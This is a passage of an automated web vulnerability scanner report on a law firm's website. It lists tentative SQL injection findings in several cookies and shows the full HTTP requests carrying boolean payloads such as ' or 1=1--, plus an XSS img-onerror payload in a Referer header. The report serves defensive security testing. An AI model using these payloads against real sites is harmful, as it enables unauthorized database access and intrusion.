    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.41. http://www.pillsburylaw.com/a [hubspotvm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 11156126'%20or%201%3d1--%20 and 11156126'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Thu, 13-May-2010 00:35:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee511156126'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.42. http://www.pillsburylaw.com/a [hubspotvw cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 19712225'%20or%201%3d1--%20 and 19712225'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Thu, 13-May-2010 00:35:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee519712225'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.43. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 69636218%20or%201%3d1--%20 and 69636218%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 17:52:49 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953769636218%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822681;path=/
Set-Cookie: CFTOKEN=69086628;path=/
Date: Thu, 12 May 2011 17:52:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.44. http://www.pillsburylaw.com/connect_forgotpassword.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14408940%20or%201%3d1--%20 and 14408940%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 17:52:55 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814408940%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11822701;path=/
Set-Cookie: CFTOKEN=52571639;path=/
Date: Thu, 12 May 2011 17:52:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.45. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 43088770'%20or%201%3d1--%20 and 43088770'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 17:53:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=43088770'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
